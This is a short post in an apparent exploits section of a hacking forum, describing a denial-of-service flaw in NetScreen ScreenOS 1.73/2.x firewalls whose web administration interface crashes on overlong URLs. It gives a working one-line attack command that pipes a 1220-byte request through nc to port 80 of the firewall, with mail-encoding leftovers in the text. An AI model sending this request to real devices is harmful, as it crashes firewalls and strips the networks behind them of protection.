Jump to content
DarkLegion

ScreenOS 1.73/2.x Firewall Denial of Service Vulnerability

By DarkLegion, in Exploituri

Recommended Posts

DarkLegion Newbie

DarkLegion

Posted
Posted

NetScreen Firewall is a network appliance used to secure against intruders and various types of attacks to a network. NetScreen has a Web administrative Interface (WebUI) used to configure and set the firewall settings.

It is possible to cause a denial of service in NetScreen Firewall. Requesting an unusually long URL to WebUI listening on default port 80, will cause the firewall to crash. A restart of the service is required in order to gain normal functionality.

Once the input URL is longer than 1220 bytes=A3=ACNetScreen firewall= will crash:

$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc= netscreen_firewall 80

SURSA

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...